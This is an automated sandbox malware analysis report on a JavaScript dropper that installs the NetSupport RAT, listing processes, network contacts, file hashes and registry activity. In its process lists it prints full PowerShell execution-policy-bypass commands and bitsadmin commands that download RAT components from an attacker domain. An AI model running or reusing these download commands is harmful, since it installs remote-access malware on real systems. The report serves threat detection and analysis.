Malware Analysis Report

2025-04-13 09:51

Sample ID 230709-x1tsyagc3z
Target ave6608jsjsjsjsjsjsjsjsjs.js
SHA256 2b04eb3c0f95ecd1e2a5b74275d82ce3d92f8b153774a59fb7243d39b1b56ae9
Tags
netsupport rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2b04eb3c0f95ecd1e2a5b74275d82ce3d92f8b153774a59fb7243d39b1b56ae9

Threat Level: Known bad

The file ave6608jsjsjsjsjsjsjsjsjs.js was found to be: Known bad.

Malicious Activity Summary

netsupport rat

NetSupport

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Download via BitsAdmin

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-09 19:19

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-09 19:19

Reported

2023-07-09 19:23

Platform

win10v2004-20230703-en

Max time kernel

162s

Max time network

177s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6608jsjsjsjsjsjsjsjsjs.js

Signatures

NetSupport

rat netsupport

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{EE35E43B-4C55-4094-8443-1411A2B5CF9F}.catalogItem | C:\Windows\System32\svchost.exe | N/A

Enumerates physical storage devices

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\svchost.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\svchost.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\svchost.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\System32\svchost.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\svchost.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6608jsjsjsjsjsjsjsjsjs.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\rakg3z3.ps1

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

"C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | virvatulishop.com | udp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 24.245.44.5.in-addr.arpa | udp
US | 8.8.8.8:53 | deperekanuki1.com | udp
RU | 5.42.74.53:5222 | deperekanuki1.com | tcp
US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp
GB | 62.172.138.8:80 | geo.netsupportsoftware.com | tcp
GB | 62.172.138.8:80 | geo.netsupportsoftware.com | tcp
GB | 62.172.138.8:80 | geo.netsupportsoftware.com | tcp
US | 8.8.8.8:53 | 53.74.42.5.in-addr.arpa | udp
US | 8.8.8.8:53 | 8.138.172.62.in-addr.arpa | udp
US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp
US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 254.150.241.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 38.148.119.40.in-addr.arpa | udp

Files

memory/1656-137-0x0000026C5A070000-0x0000026C5A080000-memory.dmp

memory/1656-138-0x0000026C5A070000-0x0000026C5A080000-memory.dmp

memory/1656-141-0x0000026C59F20000-0x0000026C59F42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1e5lhyvm.ylq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\rakg3z3.ps1

MD5 3aca9681a54650494d37d91440ea8a78
SHA1 eda71218ed383e77a09058002bb0d1ea693a84cf
SHA256 6f606c666e1fac66c4057174ec83c76d635ea80c7354cc3f3d0871efc8f9a43b
SHA512 9eba188889a4b1f1dd521d50bf529fe6db4d060ca986d443df6fdb12b79d3c6b2bd63aa4791e441722376b5c2fdebd13cd5c389eb4445da35e3e8a5597fa7d6c

memory/1656-150-0x0000026C5A070000-0x0000026C5A080000-memory.dmp

memory/1656-151-0x0000026C5C480000-0x0000026C5C494000-memory.dmp

memory/1656-152-0x0000026C5A070000-0x0000026C5A080000-memory.dmp

memory/1656-153-0x0000026C5A070000-0x0000026C5A080000-memory.dmp

memory/1656-154-0x0000026C5C4A0000-0x0000026C5C4B2000-memory.dmp

memory/1656-155-0x0000026C5C470000-0x0000026C5C47A000-memory.dmp

memory/1656-156-0x0000026C5A070000-0x0000026C5A080000-memory.dmp

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

MD5 45fe5531717cd1b9532cbb6a5daaeb3a
SHA1 cb908e267a08c37d7e184f47f788e82cca38f83e
SHA256 ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9
SHA512 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

MD5 45fe5531717cd1b9532cbb6a5daaeb3a
SHA1 cb908e267a08c37d7e184f47f788e82cca38f83e
SHA256 ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9
SHA512 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

MD5 45fe5531717cd1b9532cbb6a5daaeb3a
SHA1 cb908e267a08c37d7e184f47f788e82cca38f83e
SHA256 ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9
SHA512 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb

C:\Users\Admin\AppData\RoamingOfficeStartup\PCICL32.dll

MD5 9c9302e75c25c2ba996efd89a1047205
SHA1 9e79627ff32d5abd3382b65a509baeb31c78a7f2
SHA256 beb7b9a9fb02b2ad9965364fd6769ea0d8b324049da86eedd406e1c3703502c1
SHA512 d120b380ecd937826ab992802d8aae85f747031d50c1f6421a6c5ac32871a08f1a9c612c41946dd0aeabc01b1737cae6a1de70f9af36020af2b679e556d54fa1

C:\Users\Admin\AppData\RoamingOfficeStartup\PCICL32.DLL

MD5 9c9302e75c25c2ba996efd89a1047205
SHA1 9e79627ff32d5abd3382b65a509baeb31c78a7f2
SHA256 beb7b9a9fb02b2ad9965364fd6769ea0d8b324049da86eedd406e1c3703502c1
SHA512 d120b380ecd937826ab992802d8aae85f747031d50c1f6421a6c5ac32871a08f1a9c612c41946dd0aeabc01b1737cae6a1de70f9af36020af2b679e556d54fa1

C:\Users\Admin\AppData\RoamingOfficeStartup\pcichek.dll

MD5 104b30fef04433a2d2fd1d5f99f179fe
SHA1 ecb08e224a2f2772d1e53675bedc4b2c50485a41
SHA256 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd
SHA512 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

C:\Users\Admin\AppData\RoamingOfficeStartup\PCICHEK.DLL

MD5 104b30fef04433a2d2fd1d5f99f179fe
SHA1 ecb08e224a2f2772d1e53675bedc4b2c50485a41
SHA256 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd
SHA512 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

C:\Users\Admin\AppData\RoamingOfficeStartup\pcicapi.dll

MD5 34dfb87e4200d852d1fb45dc48f93cfc
SHA1 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641
SHA256 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703
SHA512 f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

C:\Users\Admin\AppData\RoamingOfficeStartup\pcicapi.dll

MD5 34dfb87e4200d852d1fb45dc48f93cfc
SHA1 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641
SHA256 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703
SHA512 f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

C:\Users\Admin\AppData\RoamingOfficeStartup\MSVCR100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\RoamingOfficeStartup\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\RoamingOfficeStartup\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

memory/1656-202-0x0000026C5A070000-0x0000026C5A080000-memory.dmp

C:\Users\Admin\AppData\RoamingOfficeStartup\NSM.LIC

MD5 b9956282a0fed076ed083892e498ac69
SHA1 d14a665438385203283030a189ff6c5e7c4bf518
SHA256 fcc6afd664a8045bd61c398be3c37a97536a199a48d277e11977f93868ae1acc
SHA512 7daa09113c0e8a36c91cc6d657c65851a20dff6b60ac3d2f40c5737c12c1613c553955f84d131ba2139959973fef9fc616ca5e968cb16c25acf2d4739eed87eb

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.ini

MD5 a252f22f61f960c54fa32ae0de7dd17c
SHA1 00fe1097e70f1f6307e6bc68f40d49abb01dd2d5
SHA256 a5be7a73bbed8ec4e1a7819289da5412fe9ddf628941aa3b35fbe7454f148618
SHA512 7998e6cd43853b77e38cfedf0b6081c2965c9facb891ebd9a33db0e39b71d683f218174d87f99d5ab22983632c4c319bd63ec9dcbf1cbc81a77e3053ae3f1593

C:\Users\Admin\AppData\RoamingOfficeStartup\HTCTL32.DLL

MD5 c94005d2dcd2a54e40510344e0bb9435
SHA1 55b4a1620c5d0113811242c20bd9870a1e31d542
SHA256 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899
SHA512 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

C:\Users\Admin\AppData\RoamingOfficeStartup\HTCTL32.DLL

MD5 c94005d2dcd2a54e40510344e0bb9435
SHA1 55b4a1620c5d0113811242c20bd9870a1e31d542
SHA256 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899
SHA512 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-09 19:19

Reported

2023-07-09 19:22

Platform

win7-20230705-en

Max time kernel

98s

Max time network

105s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6608jsjsjsjsjsjsjsjsjs.js

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3060 wrote to memory of 3000 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3060 wrote to memory of 3000 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3060 wrote to memory of 3000 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3000 wrote to memory of 3052 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 3052 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 3052 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2200 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2200 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2200 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2168 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2168 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2168 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2772 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2772 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2772 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2944 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2944 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2944 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2188 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2188 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2188 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 1380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 1380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 1380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2292 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2292 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2292 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 1092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 1092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 1092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2696 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2696 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2696 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2444 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2444 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2444 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\bitsadmin.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6608jsjsjsjsjsjsjsjsjs.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\z6ujb7u.ps1

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.exe C:\Users\Admin\AppData\RoamingOfficeStartupclient32.exe

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.ini C:\Users\Admin\AppData\RoamingOfficeStartupclient32.ini

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/HTCTL32.DLL C:\Users\Admin\AppData\RoamingOfficeStartupHTCTL32.DLL

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/msvcr100.dll C:\Users\Admin\AppData\RoamingOfficeStartupmsvcr100.dll

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/nskbfltr.inf C:\Users\Admin\AppData\RoamingOfficeStartupnskbfltr.inf

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/NSM.LIC C:\Users\Admin\AppData\RoamingOfficeStartupNSM.LIC

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/pcicapi.dll C:\Users\Admin\AppData\RoamingOfficeStartuppcicapi.dll

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/PCICHEK.DLL C:\Users\Admin\AppData\RoamingOfficeStartupPCICHEK.DLL

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/PCICL32.DLL C:\Users\Admin\AppData\RoamingOfficeStartupPCICL32.DLL

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/remcmdstub.exe C:\Users\Admin\AppData\RoamingOfficeStartupremcmdstub.exe

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | virvatulishop.com | udp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
FI | 5.44.245.24:443 | virvatulishop.com | tcp
FI | 5.44.245.24:443 | virvatulishop.com | tcp

Files

memory/3000-60-0x000000001B260000-0x000000001B542000-memory.dmp

memory/3000-61-0x0000000001F40000-0x0000000001F48000-memory.dmp

memory/3000-62-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/3000-63-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/3000-64-0x00000000024E0000-0x0000000002560000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\z6ujb7u.ps1

MD5 d8d4beafe295f925cf1e7c73667b99cb
SHA1 dc73efce5921033d72bbb09713b347f0e5b6358f
SHA256 82d78c24842eda98e42ff73b25fd97dd52ed9046c4c5e5200bb2ad760c18f9c3
SHA512 dfe68905caed73d5d61090598bab5db93e432098e37bf815243b7c031fd4403c3a1fbeab314edc22f466a22de521f8a2fa5bbf27356a958aafd56f2fa9feef21

memory/3000-66-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/3000-67-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/3000-68-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/3000-69-0x00000000024E0000-0x0000000002560000-memory.dmp